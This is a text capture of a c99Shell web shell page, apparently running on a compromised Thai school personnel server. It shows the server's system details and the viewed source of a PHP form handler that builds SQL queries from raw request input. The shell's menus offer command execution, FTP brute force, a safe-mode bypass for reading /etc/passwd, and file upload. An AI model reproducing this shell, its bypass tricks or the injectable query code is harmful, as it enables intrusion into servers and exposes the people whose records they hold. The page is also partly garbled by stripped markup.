!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 52.63 GB of 127.8 GB (41.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Edit_Family.php (13.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
";
		echo "


กรุณาทำการ Login ก่อน

"; echo ""; exit(); } else { /** Configuration */ require_once( "../configuration.php" ); require_once( $_Config_absolute_path . "/includes/framework.php" ); require_once( "../include/Function.php" ); require_once( "../include/FunctionDB.php" ); /** Create Database Object */ $dbObj = new DBConn; /** Config Table for This Page */ $myTable = "personal_tb"; $Username = $valid_user; $query1 = " SELECT * FROM prefix RIGHT JOIN people_tb ON prefix.prefixId=people_tb.prefixId WHERE people_tb.Teacher_code = '$Teacher_code' AND people_tb.People_Id = '$People_Id' AND people_tb.Status = '$Status' "; $result1= mysql_query($query1); $rs1 = mysql_fetch_array($result1); $sql = " SELECT * FROM $myTable WHERE Teacher_code='$Teacher_code' "; $res = mysql_query($sql); $rs= mysql_fetch_array($res); $sql2 = " SELECT * FROM prefix"; $res2 = mysql_query($sql2); list($d,$m,$y) = split('/',$_REQUEST["Birth_date"]); $Date = ($y+543)."-".$m."-".$d; $People_idcard = str_replace("-","",$_REQUEST["People_idcard"]); //*** Update Condition ***// if($_POST["hdnCmd"] == "Update") { $strSQL = "UPDATE people_tb SET prefixId = '".$_POST["Prefix"]."' ,People_name = '".$_POST["People_name"]."' ,People_surname = '".$_POST["People_surname"]."' ,People_birth = '".$Date."' ,People_idcard = '".$People_idcard."' ,People_rank = '".$_POST["Rank"]."' ,Status = '".$_POST["Status"]."' ,People_legal = '".$_POST["People_legal"]."' ,People_incom = '".$_POST["People_incom"]."' WHERE People_Id = '".$People_Id."' "; $objQuery = mysql_query($strSQL); echo ""; if(!$objQuery) { echo "Error Update [".mysql_error()."]"; } } $strSQL = "SELECT * FROM people_tb"; $objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]"); } # else ?> ศูนย์พัฒนาบุคลากร - เพิ่มข้อมูลบุคลากร
แบบฟอร์มแก้ไขข้อมูลครอบครัว » ">ข้อมูลประวัติครอบครัว
 
" >
ข้อมูลครอบครัว
     
สถานะบุคคล   *
ชื่อ - นามสกุล  
 ชื่อ "/> *  นามสกุล "/> *
เลขประจำตัวประชาชน   *
เกิดเมื่อ   /> ยังไม่บรรลุนิตภาวะ /> เป็นบุตรไร้ความสามารถ หรือเสมือนไร้ความสามารถ
บุตรลำดับที่   " /> (กรอกเฉพาะ บุตร)
 
 
 
freeresult($result); /** Close the Database */ $dbObj->disconn(); /** Unset Class */ unset($dbObj); ?>
bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--